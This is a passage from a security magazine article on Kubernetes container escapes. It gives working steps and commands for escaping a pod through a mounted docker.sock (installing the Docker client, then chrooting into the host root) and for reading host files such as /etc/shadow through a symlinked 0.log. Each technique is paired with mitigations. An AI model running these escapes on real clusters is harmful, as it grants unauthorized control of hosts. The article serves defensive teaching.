Securing the container environment

Escape Room

The Infamous sock File

The Docker daemon can listen for requests over three types of sockets: unix, tcp, and fd. By default, a Unix socket is created at /var/run/docker.sock; other container runtimes (e.g., containerd or CRI-O) create their sockets at /run/containerd/containerd.sock or /run/crio/crio.sock.

Applications that lack their own runtime may use the Docker or containerd daemon on the host to interact with containers. This is especially common for security tools, monitoring services, and service meshes that query the socket to gather information about the containers running in the cluster. One good example would be a runtime security protection tool that needs control over all containers.

When these (or equivalent) .sock files are mounted inside a container, they allow the container to interact with the runtime installed on the host. An attacker could then run commands on any container in the cluster, which effectively grants full control of the host.

To illustrate the attacker technique, look at the pod manifest file in Listing 4, which mounts /var/run/docker.sock from the host. To deploy it on your cluster, run

kubectl apply -f <file_name>.yaml

Listing 4

Pod Manifest File

apiVersion: v1
kind: Pod
metadata:
  name: docker-socket-pod
spec:
  containers:
  - name: docker-socket-container
    image: nginx
    volumeMounts:
    - name: docker-socket-volume
      mountPath: /var/run/docker.sock
  volumes:
  - name: docker-socket-volume
    hostPath:
      path: /var/run/docker.sock

Now that the pod is running successfully on the cluster, get into the container shell by running

kubectl exec -it docker-socket-pod -- /bin/bash

To leverage the docker.sock file, run

df -h | grep sock

to show that the mounted socket is present in the container. Assuming your NGINX container does not come with Docker pre-installed, go ahead and install the Docker client:

apt update && apt install -y wget
wget https://download.docker.com/linux/static/stable/x86_64/docker-18.09.0.tgz
tar -xvf docker-18.09.0.tgz
cd docker
cp docker /usr/bin

Now you can interact directly with the Docker daemon on the host. To list all containers, show daemon information, or list available images, run one of these commands:

docker -H unix:///var/run/docker.sock ps -a
docker -H unix:///var/run/docker.sock info
docker -H unix:///var/run/docker.sock images

Finally, the attack goal is within reach: Escape to the host by creating a privileged Docker container that mounts the host's root filesystem (/) into the container's /abc folder, then chroot into it by running the following command in the container:

docker -H unix:///var/run/docker.sock run --rm -it -v /:/abc:ro debian chroot /abc

You can now list all the files on the root filesystem and execute some useful commands to interact with the pods running on the node.

Note that the cluster is using containerd as the runtime, so you can run commands with crictl [8] instead of the docker command. The command in Listing 5 lists all containers on that particular node.

Listing 5

crictl Output

crictl --runtime-endpoint unix:///run/containerd/containerd.sock ps
CONTAINER        IMAGE             CREATED             STATE        NAME                      ATTEMPT       POD ID              POD
61eee33898c09    92b11f67642b6     About an hour ago   Running      docker-socket-container   0             16ee465d1120a       docker-socket-pod
38e1eb8945613    5e785d005ccc1     2 hours ago         Running      calico-kube-controllers   334           897bae6c4ca20       calico-kube-controllers-57b57c56f-2xmwl
8cc45d79ecb85    550e0029f6bd4     2 months ago        Running      health-check              0             0f1650dc41993       health-check-deployment-5b797c6cdf-kz62z
bbd1338aa1798    b8973f272a0a1     2 months ago        Running      build-code                0             3c60d6053a26a       build-code-deployment-68dd47875-85tb8
1c059432e17bc    8a648053c00f5     2 months ago        Running      hunger-check              0             56218b2e56fa8       hunger-check-deployment-96b6764f9-7zsbk
cbdd56829a054    0ff4eace8cd5b     2 months ago        Running      metadata-db               0             cfb1532ab1843       metadata-db-648b64948f-ttzlk
129d03711f19b    aa2bf2205b2c2     2 months ago        Running      cache-store               0             0257aafa379c4       cache-store-deployment-7cb76b5448-gwzfb
72f7a1082f276    f84e0146849d0     7 months ago        Running      enforcer                  1             a7c5003dc61ef       asset-mgmt-admission-enforcer-77bc7f9c77-mq28g
1760ed98e261a    2d6c7c11d7191     7 months ago        Running      agent                     1             6f7fc69a30e2b       asset-mgmt-inventory-agent-ff65ddd6d-k4rf5
60ce1262e18c2    5185b96f0becf     7 months ago        Running      coredns                   1             352e98cc2db8b       coredns-787d4945fb-rc8gk
fb734ad33071f    5185b96f0becf     7 months ago        Running      coredns                   1             bdbfdbf700263       coredns-787d4945fb-97lt4
a29cad83da33b    153f0442d7cc2     7 months ago        Running      daemon                    1             5c9045f016c33       asset-mgmt-runtime-daemon-vfsrj
edb4568bd80eb    08616d26b8e74     7 months ago        Running      calico-node               1             c6aba3d4b683e       calico-node-92zq7
c55945531ebc7    a7f25b1a3cf06     7 months ago        Running      shim                      1             1ba186d5b2f2b       asset-mgmt-imagescan-daemon-g2z79
c99bb749678ce    b6329daf3154a     7 months ago        Running      daemon                    1             1ba186d5b2f2b       asset-mgmt-imagescan-daemon-g2z79
93e070773470e    89da1fb6dcb96     7 months ago        Running      redis-containers          1             ddcb53268c97c       redis
6ff7458fd798c    f592e34f70efc     7 months ago        Running      daemon                    1             718dc88d509dd       asset-mgmt-flowlogs-daemon-td5hc
1393c8bdc62ff    92ed2bec97a63     7 months ago        Running      kube-proxy                1             5bf2de2a3af3c       kube-proxy-b65c9

To mitigate this technique, ensure that no containers mount docker.sock as a volume. Of course, that is easy to say, but what if you have requirements and use cases that need the socket mounted, as in the case of a troubleshooting container, a security tool that needs access to the host, or some other reason? In these cases, you should protect the privileged pods, have monitoring and alerting in place, and segregate the network so that only specific resources can communicate with those pods.
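As a quick guardrail, you can scan rendered manifests for runtime-socket hostPath mounts before anything reaches the cluster. The following sketch wraps the check in a function; the manifests/ directory name is a hypothetical example:

```shell
scan_manifests() {
    # List every manifest under the given directory that mounts a container
    # runtime socket via hostPath (Docker, containerd, and CRI-O paths).
    grep -rlE 'path: /(var/run/docker|run/containerd/containerd|run/crio/crio)\.sock' "$1" 2>/dev/null
}
scan_manifests manifests/ || true   # non-zero exit simply means no match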

Escaping to Host by Creating a Symbolic Link

This time, you will have a pod running as root with a mountpoint to the node's /var/log directory. This configuration may seem innocent, but it can expose the entire content of the host filesystem to any user with access to the pod's logs.

On nodes and control plane hosts, container logs live in a structured directory tree under /var/log/pods, where each container's log is a file named 0.log (Figure 4). Now consider a scenario in which a pod is configured with a hostPath volume mount to /var/log, which means the pod has access to all pod logfiles on that host. By replacing the container's 0.log file with a symlink to, for instance, /etc/shadow or any other sensitive file on the host, you can access that file by running

cat /var/log/pods/<name_of_pod>/0.log

Figure 4: /var/log/pods file structure and 0.log files from mounted container hostPath volume.

From the container, browse to the directory containing the 0.log files and replace one with a symlink (the target could be any file you need from the node):

ln -sf /etc/hostname 0.log

On the host, fetch the logs for the specific container pod,

kubectl logs checkpoint_asset-mgmt-<xxxx> -n <namespace>

and you get the error failed to get parse function: unsupported log format: "checkpoint\n", which shows the hostname from the file /etc/hostname. You just read host file content from the error message. If one of your use cases requires mounting the /var/log folder, be aware that your deployment becomes vulnerable to this host takeover technique.
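The symlink trick itself can be reproduced locally with throwaway paths, no cluster required. In this sketch, the paths under the temporary directory are stand-ins for the real /etc/hostname and /var/log/pods tree:

```shell
demo=$(mktemp -d)                                   # throwaway "host" filesystem
mkdir -p "$demo/var/log/pods/victim-pod"
echo "node01" > "$demo/etc_hostname"                # stand-in for /etc/hostname
# Replace the pod's 0.log with a symlink pointing at the sensitive file
ln -sf "$demo/etc_hostname" "$demo/var/log/pods/victim-pod/0.log"
cat "$demo/var/log/pods/victim-pod/0.log"           # follows the link: prints node01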

Several remediations and mitigations can prevent such vulnerabilities. Whenever possible, avoid containers running as root, and deploy guardrails by implementing admission controllers with policies designed to prevent root access, or to authorize only those specific images for which root is a requirement and keep them under control.
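Such a guardrail can be expressed as an admission policy. The following is a sketch modeled on Kyverno-style validation policies, assuming Kyverno is installed in the cluster; verify the exact field names and pattern operators against the Kyverno documentation before use:

```yaml
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: require-run-as-non-root
spec:
  validationFailureAction: Enforce   # reject non-compliant pods at admission
  rules:
  - name: run-as-non-root
    match:
      any:
      - resources:
          kinds:
          - Pod
    validate:
      message: "Containers must set runAsNonRoot: true."
      pattern:
        spec:
          containers:
          - securityContext:
              runAsNonRoot: true
```

Exceptions for images that genuinely require root can then be granted as explicit, audited policy exclusions rather than by disabling the control.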

Another course of action is simply not to deploy pods with a writable hostPath to /var/log. Much better is to mount it read-only.
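A read-only mount follows the same hostPath pattern as Listing 4, with readOnly: true added on the volume mount. The pod, container, and volume names here are illustrative:

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: log-reader
spec:
  containers:
  - name: log-reader
    image: nginx
    volumeMounts:
    - name: varlog
      mountPath: /var/log
      readOnly: true     # blocks the ln -sf step of the symlink attack
  volumes:
  - name: varlog
    hostPath:
      path: /var/log
```

With readOnly: true, the container can still ship or inspect logs, but any attempt to create the malicious symlink fails with a read-only filesystem error.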

Conclusion

Protecting your data needs to be a priority for your business. Always apply the principle of least privilege when running your workloads. Never underestimate your adversaries: Attackers target businesses indiscriminately, dedicate many hours a day to working diligently toward their goals, and will compromise your infrastructure if given the chance. The escape techniques discussed in this article should serve as an example of how your assets could be at risk.

The Author

Raul Lapaz works as a Cloud and Kubernetes security engineer at the Swiss pharmaceutical company Roche, with more than 25 years of experience in the IT world. His primary role is to design, implement, and deploy a secure cloud and container environment for health care digital products in AWS. He is very passionate about his work and loves to write technical articles for magazines in his free time.
